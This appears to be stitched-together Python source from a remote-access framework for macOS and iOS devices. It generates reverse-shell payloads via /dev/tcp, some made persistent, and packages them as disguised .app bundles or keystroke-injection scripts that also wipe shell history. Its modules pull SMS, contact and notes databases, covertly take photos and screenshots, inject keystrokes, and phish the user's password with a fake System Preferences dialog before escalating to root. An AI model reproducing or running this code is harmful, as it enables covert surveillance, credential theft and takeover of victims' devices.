def run(self, session, cmd_data):
if not cmd_data['args'] or (cmd_data['args'] != "front"
and cmd_data['args'] != "back"):
print self.usage
return
if cmd_data['args'] == "back":
cmd_data['args'] = False
else:
cmd_data['args'] = True
h.info_general("Taking picture...")
try:
response = json.loads(session.send_command(cmd_data))
if 'success' in response:
size = int(response["size"])
if cmd_data['args'] == False:
file_name = "back_{0}.jpg".format(int(time.time()))
else:
file_name = "front_{0}.jpg".format(int(time.time()))
data = session.sock_receive_data(size)
h.info_general("Saving {0}".format(file_name))
# save to file
f = open(os.path.join('downloads', file_name), 'w')
f.write(data)
f.close()
h.info_success("Saved to downloads/{0}!".format(file_name))
else:
if 'error' in response:
h.info_error(response['error'])
else:
h.info_error("Unexpected error!")
except Exception as e:
print e
def run(self, session, cmd_data):
if not cmd_data['args']:
print self.usage
return
else:
paths = re.split(r'(?<!\\) ', cmd_data['args'].rstrip())
if len(paths) > 2:
print "Usage: upload <local_file> <remote_dir>"
return
local_dir = os.path.split(paths[0])[0]
local_file = os.path.split(paths[0])[1]
if len(paths) == 1:
remote_dir = "."
remote_file = local_file
else:
remote_dir = os.path.split(paths[1])[0]
if not remote_dir:
remote_dir = "."
remote_file = os.path.split(paths[1])[1]
if not remote_file:
remote_file = local_file
session.upload_file(paths[0], remote_dir, remote_file)
h.info_general("File successfully uploaded!")
def interact(self):
h.info_general("Listening on port {0}...".format(self.server.port))
h.info_general("Type \"help\" for commands.")
while 1:
try:
input_data = raw_input(self.handle)
if not input_data:
continue
cmd = input_data.split()[0]
args = input_data[len(cmd):].strip()
if cmd == "interact":
self.interact_with_session(args)
elif cmd == "close":
self.close_session(args)
elif cmd == "sessions":
self.list_sessions()
elif cmd == "help":
self.show_commands()
elif cmd == "exit":
self.stop_server()
return
else:
h.info_error("Unrecognized command!")
except KeyboardInterrupt:
sys.stdout.write("\n")
self.stop_server()
return
def run(self,server):
while 1:
shell = raw_input(h.info_general_raw("Target Shell: "))
name = raw_input(h.info_general_raw("Application Name: "))
icon = raw_input(h.info_general_raw("Application Icon: "))
persistence = raw_input(h.info_question_raw("Make Persistent? (y/N): ")).lower()
if persistence == "y":
shell_command = "while true; do $("+shell+" &> /dev/tcp/"+str(server.host)+"/"+str(server.port)+" 0>&1); sleep 5; done & "
break
elif persistence == "n" or not persistence:
shell_command = shell+" &> /dev/tcp/"+str(server.host)+"/"+str(server.port)+" 0>&1;"
break
else:
h.info_error("Unrecognized option!")
if os.path.exists("payloads") == False:
os.mkdir("payloads")
if os.path.exists("payloads/macos_application") == False:
os.mkdir("payloads/macos_application")
os.system("""
cp -r data/app/payload.app payloads/macos_application
mv payloads/macos_application/payload.app payloads/macos_application/"""+name+""".app
mv """+icon+""" payloads/macos_application/"""+name+""".app/Contents/Resources/payload.icns
""")
payload_save_path = "payloads/macos_application/"+name+".app/Contents/MacOS/payload.sh"
sas = "payloads/macos_application/"+name+".app"
payload = """\
#! /usr/bin/env bash
"""+shell_command+"""
"""
f = open(payload_save_path,"w")
f.write(payload)
f.close()
h.info_general("Payload saved to " + sas)
os.system("chmod +x payloads/macos_application/"+name+".app/Contents/MacOS/payload.sh")
def run(self,server):
shell = input(h.info_general_raw("Target shell: ")).strip(" ")
if shell == "":
shell = "sh"
h.info_general("Creating payload...")
payload = shell+" &> /dev/tcp/"+server.host+"/"+str(server.port)+" 0>&1"
h.info_command(payload)
def set_host_port(self):
try:
lhost = h.getip()
lport = None
choice = input(h.info_general_raw("Local host: ")).strip(" ")
if choice != "":
lhost = choice
while True:
lport = input(h.info_general_raw("Local port: ")).strip(" ")
if not lport:
lport = 4444
try:
lport = int(lport)
except ValueError:
h.info_error("Invalid port, please enter a valid integer.")
continue
if lport < 1024:
h.info_error("Invalid port, please enter a value >= 1024.")
continue
break
h.info_general("Using " + lhost + ":" + str(lport) + "...")
self.host = socket.gethostbyname(lhost)
self.port = lport
return True
except KeyboardInterrupt:
return
def run(self, session, cmd_data):
if len(cmd_data['args'].split()) < 1:
print(self.usage)
return
w = os.environ['OLDPWD']
os.chdir(w)
dest = cmd_data['args'].split()[0]
if os.path.isdir(dest):
if os.path.exists(dest):
h.info_general("Getting contacts...")
data = session.download_file(
'/var/mobile/Library/AddressBook/AddressBook.sqlitedb')
if data:
f = open(os.path.join(dest, 'contacts.sqlitedb'), 'wb')
f.write(data)
f.close()
if dest[-1] == "/":
h.info_general("Saving to " + dest +
"contacts.sqlitedb...")
time.sleep(1)
h.info_info("Saved to " + dest + "contacts.sqlitedb.")
else:
h.info_general("Saving to " + dest +
"/contacts.sqlitedb...")
time.sleep(1)
h.info_info("Saved to " + dest + "/contacts.sqlitedb.")
else:
h.info_error("Failed to get contacts!")
else:
h.info_error("Local directory: " + dest + ": does not exist!")
else:
rp = os.path.split(dest)[0]
if rp == "":
rp = "."
else:
pass
if os.path.exists(rp):
if os.path.isdir(rp):
pr = os.path.split(dest)[0]
rp = os.path.split(dest)[1]
h.info_general("Getting contacts...")
data = session.download_file(
'/var/mobile/Library/AddressBook/AddressBook.sqlitedb')
if data:
f = open(os.path.join(pr, rp), 'wb')
f.write(data)
f.close()
h.info_general("Saving to " + dest + "...")
time.sleep(1)
h.info_info("Saved to " + dest + ".")
else:
h.info_error("Failed to get contacts!")
else:
h.info_error("Error: " + rp + ": not a directory!")
else:
h.info_error("Local directory: " + rp + ": does not exist!")
g = os.environ['HOME']
os.chdir(g + "/mouse")
def disconnect(self, verbose):
self.conn.close()
if verbose:
h.info_general("Closing session...")
time.sleep(0.5)
if self.server.multihandler.is_running:
del self.server.multihandler.sessions_id[self.id]
del self.server.multihandler.sessions_uid[self.uid]
def close_all_sessions(self):
h.info_general("Cleaning up...")
try:
for key in self.sessions_id.keys():
session = self.sessions_id[key]
session.disconnect(False)
except:
pass
def run(self,server):
while 1:
shell = raw_input(h.info_general_raw("Target shell: ")).strip(" ")
while shell == "":
shell = raw_input(h.info_general_raw("Target shell: ")).strip(" ")
persistence = raw_input(h.info_question_raw("Make persistent? (y/n): ")).strip(" ").lower()
if persistence == "y":
shell_command = "while true; do $("+shell+" &> /dev/tcp/"+str(server.host)+"/"+str(server.port)+" 0>&1); sleep 5; done & "
break
else:
shell_command = shell+" &> /dev/tcp/"+str(server.host)+"/"+str(server.port)+" 0>&1;"
break
shell_command += "history -wc;killall Terminal"
path = raw_input(h.info_general_raw("Output path: ")).strip(" ")
if path == "":
path = "payload.txt"
if os.path.isdir(path):
if os.path.exists(path):
if path[-1:] == "/":
payload_save_path = path + "payload.txt"
else:
payload_save_path = path + "/payload.txt"
else:
h.info_error("Local directory: "+path+": does not exist!")
exit
else:
direct = os.path.split(path)[0]
if direct == "":
direct = "."
else:
pass
if os.path.exists(direct):
if os.path.isdir(direct):
payload_save_path = path
else:
h.info_error("Error: "+direct+": not a directory!")
exit
else:
h.info_error("Local directory: "+direct+": does not exist!")
exit
payload = """\
DELAY 500
COMMAND SPACE
DELAY 500
STRING terminal
DELAY 500
ENTER
DELAY 500
STRING """+shell_command+"""
DELAY 500
ENTER
DELAY 500"""
h.info_general("Saving to " + payload_save_path + "...")
f = open(payload_save_path,"w")
f.write(payload)
f.close()
h.info_success("Saved to " + payload_save_path + "!")
def run(self, session, cmd_data):
h.info_general("Connecting to device...")
time.sleep(0.5)
h.info_general("Opening device shell...")
time.sleep(1)
while 1:
uid = session.send_command({
"cmd": "echo",
"args": "$UID"
}).decode()
if uid[:-1] == "0":
whoami = "# "
else:
whoami = "$ "
shell = input(h.ENDC + session.hostname + ":" +
session.current_directory + " " + session.username +
whoami).strip(" ")
if not shell or shell.replace(" ", "") == "":
continue
shelld = shell.split()[0]
shelld_data = {"cmd": shelld, "args": shell[len(shelld) + 1:]}
if shelld == "cd":
result = json.loads(session.send_command(shelld_data))
if 'error' in result:
h.info_error(result['error'])
elif 'current_directory' in result:
session.current_directory = result['current_directory']
else:
h.info_error('Unable to get current directory!')
if shelld == "ls":
if len(shell.split()) < 2:
print(
session.send_command({
'cmd': 'ls -al',
'args': '.'
}).decode())
else:
print(
session.send_command({
'cmd': 'ls -al',
'args': shell.split()[1]
}).decode())
if shelld == "exit":
return
else:
try:
if shelld == "ls" or shelld == "cd":
pass
else:
result = session.send_command({
'cmd': '',
'args': shell
})
if result:
print(result.decode().rstrip())
except KeyboardInterrupt:
session.send_command({"cmd": "killtask"})
def run(self, session, cmd_data):
h.info_general("Launching SafeMode...")
time.sleep(1)
cmd_data["cmd"] = ";"
cmd_data[
"args"] = "touch /var/mobile/Library/Preferences/com.saurik.mobilesubstrate.dat; killall SpringBoard"
error = session.send_command(cmd_data)
if error:
h.info_error("Failed to put device into SafeMode!")
def run(self, session, cmd_data):
h.info_general("Launching SafeMode...")
time.sleep(1)
cmd_data["cmd"] = ";"
cmd_data[
"args"] = "touch /var/mobile/Library/Preferences/com.saurik.mobilesubstrate.dat; killall SpringBoard"
result = session.send_command(cmd_data)
if result:
print(result.decode())
def run(self, session, cmd_data):
if len(cmd_data['args'].split()) < 1:
print self.usage
return
dest = cmd_data['args'].split()[0]
if os.path.isdir(dest):
if os.path.exists(dest):
h.info_general("Taking picture...")
response = json.loads(session.send_command(cmd_data))
try:
success = response["status"]
if success == 1:
size = int(response["size"])
data = session.sock_receive_data(size)
f = open(os.path.join(dest, 'picture.jpg'), 'w')
f.write(data)
f.close()
except:
h.info_error("Failed to take picture!")
return
if dest[-1:] == "/":
h.info_general("Saving to " + dest + "picture.jpg...")
time.sleep(1)
h.info_success("Saved to " + dest + "picture.jpg!")
else:
h.info_general("Saving to " + dest + "/picture.jpg...")
time.sleep(1)
h.info_success("Saved to " + dest + "/picture.jpg!")
else:
h.info_error("Local directory: " + dest + ": does not exist!")
else:
rp = os.path.split(dest)[0]
if os.path.exists(rp):
if os.path.isdir(rp):
pr = os.path.split(dest)[0]
rp = os.path.split(dest)[1]
h.info_general("Taking picture...")
response = json.loads(session.send_command(cmd_data))
try:
success = response["status"]
if success == 1:
size = int(response["size"])
data = session.sock_receive_data(size)
f = open(os.path.join(pr, rp), 'w')
f.write(data)
f.close()
except:
h.info_error("Failed to take picture!")
return
h.info_general("Saving to " + dest + "...")
time.sleep(1)
h.info_success("Saved to " + dest + "!")
else:
h.info_error("Error: " + rp + ": not a directory!")
else:
h.info_error("Local directory: " + rp + ": does not exist!")
def run(self, session, cmd_data):
if len(cmd_data['args'].split()) < 1:
print self.usage
return
dest = cmd_data['args'].split()[0]
if os.path.isdir(dest):
if os.path.exists(dest):
h.info_general("Taking screenshot...")
result = json.loads(session.send_command(cmd_data))
if 'error' in result:
h.info_error("Failed to take screenshot!")
return
if 'size' in result:
size = int(result['size'])
data = session.sock_receive_data(size)
f = open(os.path.join(dest, 'screenshot.jpg'), 'w')
f.write(data)
f.close()
if dest[-1:] == "/":
h.info_general("Saving to " + dest + "screenshot.jpg...")
time.sleep(1)
h.info_success("Saved to " + dest + "screenshot.jpg!")
else:
h.info_general("Saving to " + dest + "/screenshot.jpg...")
time.sleep(1)
h.info_success("Saved to " + dest + "/screenshot.jpg!")
else:
h.info_error("Local directory: " + dest + ": does not exist!")
else:
rp = os.path.split(dest)[0]
if rp == "":
rp = "."
else:
pass
if os.path.exists(rp):
if os.path.isdir(rp):
pr = os.path.split(dest)[0]
rp = os.path.split(dest)[1]
h.info_general("Taking screenshot...")
result = json.loads(session.send_command(cmd_data))
if 'error' in result:
h.info_error("Failed to take screenshot!")
return
if 'size' in result:
size = int(result['size'])
data = session.sock_receive_data(size)
f = open(os.path.join(pr, rp), 'w')
f.write(data)
f.close()
h.info_general("Saving to " + dest + "...")
time.sleep(1)
h.info_success("Saved to " + dest + "!")
else:
h.info_error("Error: " + rp + ": not a directory!")
else:
h.info_error("Local directory: " + rp + ": does not exist!")
def close_session(self, session_number):
if not session_number:
print "Usage: close <session_ID>"
return
try:
session = self.sessions_id[int(session_number)]
session.disconnect(False)
h.info_general('Closing session ' + session_number + '...')
except:
h.info_error("Invalid session ID!")
def run(self, server):
while 1:
shell = raw_input(h.info_general_raw("Target Shell: ")).strip(" ")
icon = raw_input(
h.info_general_raw("Application Icon: ")).strip(" ")
persistence = raw_input(
h.info_question_raw("Make Persistent? (y/n): ")).strip(
" ").lower()
if persistence == "y":
shell_command = "while true; do $(" + shell + " &> /dev/tcp/" + str(
server.host) + "/" + str(
server.port) + " 0>&1); sleep 5; done & "
break
else:
shell_command = shell + " &> /dev/tcp/" + str(
server.host) + "/" + str(server.port) + " 0>&1;"
break
path = raw_input(h.info_general_raw("Output File: ")).strip(" ")
w = os.environ['OLDPWD']
os.chdir(w)
if os.path.isdir(path):
if os.path.exists(path):
if path[:-1] == "/":
payload_save_path = path + "payload.app"
else:
payload_save_path = path + "/payload.app"
else:
h.info_error("Local directory: " + path + ": does not exist!")
exit
else:
direct = os.path.split(path)[0]
if os.path.exists(direct):
if os.path.isdir(direct):
payload_save_path = path + "/Contents/MacOS/payload.sh"
else:
h.info_error("Error: " + direct + ": not a directory!")
exit
else:
h.info_error("Local directory: " + direct +
": does not exist!")
exit
os.system("cp -r data/app/payload.app " + path + " > /dev/null")
os.system("mv " + icon + " " + path +
"/Contents/Resources/payload.icns > /dev/null")
payload = """\
#! /usr/bin/env bash
""" + shell_command
h.info_general("Saving to " + path + "...")
f = open(payload_save_path, "w")
f.write(payload)
f.close()
h.info_success("Saved to " + path + "!")
os.system("chmod +x " + path + "/Contents/MacOS/payload.sh")
g = os.environ['HOME']
os.chdir(g + "/mouse")
def run(self, session, cmd_data):
file_name = "sms.db"
h.info_general("Downloading {0}".format(file_name))
data = session.download_file('/var/mobile/Library/SMS/' + file_name)
if data:
# save to downloads
h.info_general("Saving {0}".format(file_name))
f = open(os.path.join('downloads', file_name), 'w')
f.write(data)
f.close()
h.info_success("Saved to downloads/{0}!".format(file_name))
def run(self, session, cmd_data):
if len(cmd_data['args'].split()) < 1:
print(self.usage)
return
dest = cmd_data['args'].split()[0]
if os.path.isdir(dest):
if os.path.exists(dest):
h.info_general("Getting notes...")
data = session.download_file(
'/var/mobile/Library/Notes/notes.sqlite')
if data:
f = open(os.path.join(dest, 'notes.sqlite'), 'wb')
f.write(data)
f.close()
if dest[-1] == "/":
h.info_general("Saving to " + dest + "notes.sqlite...")
time.sleep(1)
h.info_success("Saved to " + dest + "notes.sqlite!")
else:
h.info_general("Saving to " + dest +
"/notes.sqlite...")
time.sleep(1)
h.info_success("Saved to " + dest + "/notes.sqlite!")
else:
h.info_error("Failed to get notes!")
else:
h.info_error("Local directory: " + dest + ": does not exist!")
else:
rp = os.path.split(dest)[0]
if rp == "":
rp = "."
else:
pass
if os.path.exists(rp):
if os.path.isdir(rp):
pr = os.path.split(dest)[0]
rp = os.path.split(dest)[1]
h.info_general("Getting notes...")
data = session.download_file(
'/var/mobile/Library/Notes/notes.sqlite')
if data:
f = open(os.path.join(pr, rp), 'wb')
f.write(data)
f.close()
h.info_general("Saving to " + dest + "...")
time.sleep(1)
h.info_success("Saved to " + dest + "!")
else:
h.info_error("Failed to get notes!")
else:
h.info_error("Error: " + rp + ": not a directory!")
else:
h.info_error("Local directory: " + rp + ": does not exist!")
def run(self,session,cmd_data):
#do something with conn if you want
h.info_general("Press Ctrl-C to stop.")
h.info_general("Device keyboard:")
while 1:
key = getch()
if key == chr(03):
return ""
payload = """tell application "System Events"
keystroke \""""+key+"""\"
end tell"""
session.send_command({"cmd":"applescript","args":payload})
def run(self,session,cmd_data):
h.info_general("Connecting to device...")
time.sleep(0.5)
h.info_general("Openning device shell...")
time.sleep(1)
while 1:
uid = session.send_command({"cmd":"echo","args":"$UID"})
if uid[:-1] == "0":
whoami = "# "
else:
whoami = "$ "
shell = raw_input(h.ENDC+session.hostname+":"+session.current_directory+" "+session.username+whoami).strip(" ")
if not shell or shell.replace(" ","") == "":
continue
shelld = shell.split()[0]
shelld_data = {"cmd": shelld, "args":shell[len(shelld) + 1:]}
if shelld == "cd":
result = json.loads(session.send_command(shelld_data))
if 'error' in result:
h.info_error(result['error'])
elif 'current_directory' in result:
session.current_directory = result['current_directory'].encode('utf-8')
else:
h.info_error('Unable to get current directory!')
if shelld == "ls":
if not shelld_data['args']:
shelld_data['args'] = '.'
data = session.send_command(shelld_data)
try:
contents = json.loads(data)
except:
print data
keys = contents.keys()
keys.sort()
for k in keys:
if contents[k] == 4 or contents[k] == 10:
print h.COLOR_INFO + k + h.ENDC
else:
print k
if shelld == "exit":
return
else:
try:
result = session.send_command(shelld_data)
if result:
if shelld == "ls" or shelld == "cd":
pass
else:
print result.rstrip()
except KeyboardInterrupt:
session.send_command({"cmd":"killtask"})
def run(self, session, cmd_data):
if not cmd_data['args']:
print self.usage
return
file_name = os.path.split(cmd_data['args'])[-1]
h.info_general("Downloading {0}...".format(file_name))
data = session.download_file(cmd_data['args'])
if data:
# save to downloads
h.info_general("Saving {0}...".format(file_name))
f = open(os.path.join('downloads', file_name), 'w')
f.write(data)
f.close()
h.info_success("File saved to downloads/{0}!".format(file_name))
def run(self,session,cmd_data):
if len(cmd_data['args'].split()) < 2:
print self.usage
return
w = os.environ['OLDPWD']
os.chdir(w)
payload = """if [[ -d """+cmd_data['args'].split()[0]+""" ]]
then
echo 0
fi"""
dchk = session.send_command({"cmd":"","args":payload})
chk = session.send_command({"cmd":"stat","args":cmd_data['args'].split()[0]})
if chk[:4] != "stat":
if dchk == "0\n":
h.info_error("Error: "+cmd_data['args'].split()[0]+": not a file!")
else:
if os.path.isdir(cmd_data['args'].split()[1]):
if os.path.exists(cmd_data['args'].split()[1]):
rp = os.path.split(cmd_data['args'].split()[0])[1]
data = session.download_file(cmd_data['args'].split()[0])
h.info_general("Downloading {0}...".format(rp))
if data:
h.info_general("Saving to "+cmd_data['args']+"/{0}...".format(rp))
f = open(os.path.join(cmd_data['args'].split()[1],rp),'w')
f.write(data)
f.close()
if cmd_data['args'].split()[1][-1:] == "/":
h.info_success("Saved to "+cmd_data['args'].split()[1]+""+rp+"!")
else:
h.info_success("Saved to "+cmd_data['args'].split()[1]+"/"+rp+"!")
else:
h.info_error("Local directory: "+cmd_data['args'].split()[1]+": does not exist!")
else:
rp = os.path.split(cmd_data['args'].split()[1])[0]
if rp == "":
rp = "."
else:
pass
if os.path.exists(rp):
if os.path.isdir(rp):
prr = os.path.split(cmd_data['args'].split()[1])[0]
rp = os.path.split(cmd_data['args'].split()[1])[1]
pr = os.path.split(cmd_data['args'].split()[0])[1]
data = session.download_file(cmd_data['args'].split()[0])
h.info_general("Downloading {0}...".format(pr))
if data:
h.info_general("Saving to {0}...".format(cmd_data['args'].split()[1]))
f = open(os.path.join(prr,rp),'w')
f.write(data)
f.close()
h.info_success("Saved to "+cmd_data['args'].split()[1]+"!")
else:
h.info_error("Error: "+rp+": not a directory!")
else:
h.info_error("Local directory: "+rp+": does not exists!")
else:
h.info_error("Remote file: "+cmd_data['args'].split()[0]+": does not exist!")
g = os.environ['HOME']
os.chdir(g + "/mouse")
def run(self, session, cmd_data):
if len(cmd_data['args'].split()) < 1:
print self.usage
return
w = os.environ['OLDPWD']
os.chdir(w)
dest = cmd_data['args'].split()[0]
if os.path.isdir(dest):
if os.path.exists(dest):
h.info_general("Getting notes...")
data = session.download_file(
'/var/mobile/Library/Notes/notes.sqlite')
if data:
f = open(os.path.join(dest, 'notes.sqlite'), 'w')
f.write(data)
f.close()
if dest[-1:] == "/":
h.info_general("Saving to " + dest + "notes.sqlite...")
time.sleep(1)
h.info_success("Saved to " + dest + "notes.sqlite!")
else:
h.info_general("Saving to " + dest + "/notes.sqlite...")
time.sleep(1)
h.info_success("Saved to " + dest + "/notes.sqlite!")
else:
h.info_error("Local directory: " + dest + ": does not exist!")
else:
rp = os.path.split(dest)[0]
if os.path.exists(rp):
if os.path.isdir(rp):
pr = os.path.split(dest)[0]
rp = os.path.split(dest)[1]
h.info_general("Getting notes...")
data = session.download_file(
'/var/mobile/Library/Notes/notes.sqlite')
if data:
f = open(os.path.join(pr, rp), 'w')
f.write(data)
f.close()
h.info_general("Saving to " + dest + "...")
time.sleep(1)
h.info_success("Saved to " + dest + "!")
else:
h.info_error("Error: " + rp + ": not a directory!")
else:
h.info_error("Local directory: " + rp + ": does not exist!")
g = os.environ['HOME']
os.chdir(g + "/mouse")
def run(self, session, cmd_data):
payload = """
tell application "Finder"
activate
set myprompt to "Type your password to allow System Preferences to make changes"
set ans to "Cancel"
repeat
try
set d_returns to display dialog myprompt default answer "" with hidden answer buttons {"Cancel", "OK"} default button "OK" with icon path to resource "FileVaultIcon.icns" in bundle "/System/Library/CoreServices/CoreTypes.bundle"
set ans to button returned of d_returns
set mypass to text returned of d_returns
if mypass > "" then exit repeat
end try
end repeat
try
do shell script "echo " & quoted form of mypass
end try
end tell
"""
cmd_data.update({"cmd": "applescript", "args": payload})
password = session.send_command(cmd_data).strip()
#display response
print h.COLOR_INFO + "[*] " + h.WHITE + "Response: " + h.GREEN + password + h.WHITE
#prompt for root
tryroot = raw_input("Would you like to try for root? (Y/n) ").strip(
" ")
tryroot = tryroot if tryroot else "y"
if tryroot.lower() != "y":
return ""
#TODO: I am so lazy, probably should use the su command
password = password.replace("\\", "\\\\").replace("'", "\\'")
cmd_data.update({"cmd": "eggsu", "args": password})
result = session.send_command(cmd_data)
if "root" in result:
h.info_general("Root Granted!")
time.sleep(0.2)
h.info_general("Escalating Privileges...")
if session.server.is_multi == False:
session.server.update_session(session)
else:
session.needs_refresh = True
else:
h.info_error("Failed getting root!")
return ""
def listen_for_stager(self):
identification_shell_command = 'com=$(uname -p); if [ $com != "unknown" ]; then echo $com; else uname; fi\n'
h.info_general("Binding to " + self.host + ":" + str(self.port) +
"...")
sr = os.system("ping -c 1 " + self.host + " >/dev/null 2>&1")
if sr != 0:
h.info_error("Failed to bind to " + self.host + ":" +
str(self.port) + "!")
input("Press enter to continue...").strip(" ")
return
try:
s = socket.socket()
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind(('0.0.0.0', self.port))
s.listen(1)
except:
h.info_error("Failed to bind to " + self.host + ":" +
str(self.port) + "!")
input("Press enter to continue...").strip(" ")
return
h.info_general("Listening on port " + str(self.port) + "...")
try:
conn, addr = s.accept()
except KeyboardInterrupt:
s.close()
return
hostAddress = addr[0]
h.info_general("Connecting to " + hostAddress + "...")
conn.send(identification_shell_command.encode())
try:
device_arch = conn.recv(128).decode().strip()
if not device_arch:
return
except:
return
try:
bash_stager, executable = self.craft_payload(device_arch)
except Exception as e:
return
self.debug_print(bash_stager.strip())
conn.send(bash_stager.encode())
conn.send(executable)
conn.close()
h.info_general("Establishing connection...")
try:
return self.listen_for_executable_payload(s)
except ssl.SSLError as e:
h.info_error("SSL error: " + str(e))
return
except Exception as e:
h.info_error("Error: " + str(e))
input("Press enter to continue...").strip(" ")
return
def run(self, session, cmd_data):
h.info_general("Taking screenshot...")
result = json.loads(session.send_command(cmd_data))
if 'error' in result:
h.info_error(result['error'])
return
elif 'size' in result:
size = int(result['size'])
data = session.sock_receive_data(size)
file_name = "screenshot_{0}.jpg".format(int(time.time()))
h.info_general("Saving {0}".format(file_name))
# save to file
f = open(os.path.join('downloads', file_name), 'w')
f.write(data)
f.close()
h.info_success("Saved to downloads/{0}!".format(file_name))
def run(self, session, cmd_data):
password = getpass.getpass("Password: "******"\\", "\\\\").replace("'", "\\'")
cmd_data['cmd'] = "eggsu"
result = session.send_command(cmd_data)
if "root" in result:
h.info_general("Root Granted!")
time.sleep(0.2)
h.info_general("Escalating Privileges...")
if session.server.is_multi == False:
session.server.update_session(session)
else:
session.needs_refresh = True
else:
h.info_error("Failed getting root!")
def run(self, session, cmd_data):
if len(cmd_data['args'].split()) < 1:
print self.usage
return
dest = cmd_data['args'].split()[0]
if os.path.isdir(dest):
if os.path.exists(dest):
h.info_general("Getting contacts...")
data = session.download_file(
'/var/mobile/Library/AddressBook/AddressBook.sqlitedb')
if data:
f = open(os.path.join(dest, 'contacts.sqlitedb'), 'w')
f.write(data)
f.close()
if dest[-1:] == "/":
h.info_general("Saving to " + dest +
"contacts.sqlitedb...")
time.sleep(1)
h.info_success("Saved to " + dest + "contacts.sqlitedb!")
else:
h.info_general("Saving to " + dest +
"/contacts.sqlitedb...")
time.sleep(1)
h.info_success("Saved to " + dest + "/contacts.sqlitedb!")
else:
h.info_error("Local directory: " + dest + ": does not exist!")
else:
rp = os.path.split(dest)[0]
if os.path.exists(rp):
if os.path.isdir(rp):
pr = os.path.split(dest)[0]
rp = os.path.split(dest)[1]
h.info_general("Getting contacts...")
data = session.download_file(
'/var/mobile/Library/AddressBook/AddressBook.sqlitedb')
if data:
f = open(os.path.join(pr, rp), 'w')
f.write(data)
f.close()
h.info_general("Saving to " + dest + "...")
time.sleep(1)
h.info_success("Saved to " + dest + "!")
else:
h.info_error("Error: " + rp + ": not a directory!")
else:
h.info_error("Local directory: " + rp + ": does not exist!")
def run(self, session, cmd_data):
h.info_general("Taking picture...")
response = json.loads(session.send_command(cmd_data))
try:
success = response["status"]
if success == 1:
size = int(response["size"])
file_name = "isight_{0}.jpg".format(int(time.time()))
data = session.sock_receive_data(size)
h.info_general("Saving {0}".format(file_name))
# save to file
f = open(os.path.join('downloads', file_name), 'w')
f.write(data)
f.close()
h.info_success("Saved to downloads/{0}!".format(file_name))
except Exception as e:
print e
